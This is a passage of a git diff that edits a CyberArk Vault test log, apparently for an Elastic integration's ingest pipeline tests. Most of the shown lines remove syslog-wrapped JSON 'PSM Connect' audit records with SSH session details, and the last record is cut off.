b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log index 74928df0a23..ce2f13e9d7d 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log @@ -1,17 +1,17 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"300","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-11T17:38:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:20\n 2021-03-11T17:38:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:20","IsoTimestamp":"2021-03-11T17:38:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:46:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:56\n 2021-03-11T17:46:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:56","IsoTimestamp":"2021-03-11T17:46:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:34Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:34\n 2021-03-11T17:48:34Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:34","IsoTimestamp":"2021-03-11T17:48:34Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:54:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:56\n 2021-03-11T17:54:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:56","IsoTimestamp":"2021-03-11T17:54:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:37\n 2021-03-11T17:56:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:37","IsoTimestamp":"2021-03-11T17:56:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:25\n 2021-03-11T20:23:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:25","IsoTimestamp":"2021-03-11T20:23:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:37\n 2021-03-14T13:49:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:37","IsoTimestamp":"2021-03-14T13:49:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:50:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:50:43\n 2021-03-14T13:50:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:50:43","IsoTimestamp":"2021-03-14T13:50:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:31:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:56\n 2021-03-15T10:31:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:56","IsoTimestamp":"2021-03-15T10:31:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:39Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:39\n 2021-03-15T10:33:39Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:39","IsoTimestamp":"2021-03-15T10:33:39Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:35:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:00\n 2021-03-15T10:35:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:00","IsoTimestamp":"2021-03-15T10:35:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T13:18:31Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:31\n 2021-03-15T13:18:31Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:31","IsoTimestamp":"2021-03-15T13:18:31Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:06\n 2021-03-15T14:08:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:06","IsoTimestamp":"2021-03-15T14:08:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:28\n 2021-03-15T14:08:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:28","IsoTimestamp":"2021-03-15T14:08:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T14:11:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:09\n 2021-03-15T14:11:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:09","IsoTimestamp":"2021-03-15T14:11:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;","Message":"PSM 